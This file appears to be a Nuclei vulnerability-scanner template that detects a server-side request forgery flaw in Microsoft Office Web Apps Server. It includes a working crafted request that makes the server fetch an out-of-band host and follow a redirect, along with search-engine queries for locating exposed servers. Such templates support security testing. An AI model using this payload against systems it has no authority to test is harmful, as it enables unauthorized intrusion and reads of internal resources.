id: office-webapps-ssrf

info:
  name: Office Web Apps Server Full Read - Server Side Request Forgery
  author: DhiyaneshDK
  severity: high
  reference:
    - https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view (Slide 37,38)
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Provide a link that opens Word"
    fofa-query: body="Provide a link that opens Word"
  tags: microsoft,office-webapps,redirect
variables:
  oast: "{{interactsh-url}}"
  string: "{{to_lower(rand_text_alpha(4))}}"

http:
  - raw:
      - |
        GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://oast.pro%26status=302&access_token_ttl=0 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')
          - contains(body,'<h1> Interactsh Server </h1>')
          - status_code == 200
        condition: and

# digest: 4a0a0047304502207e37c166b7939e67027a532a414b3ed954332b97d7a1ba9c8bc3ccf98c206614022100ba38deb6e2059ad4b76f56fae8b4f0accce143472e8c236e297c90365c1306c7:922c64590222798bb761d5b6d8e72950
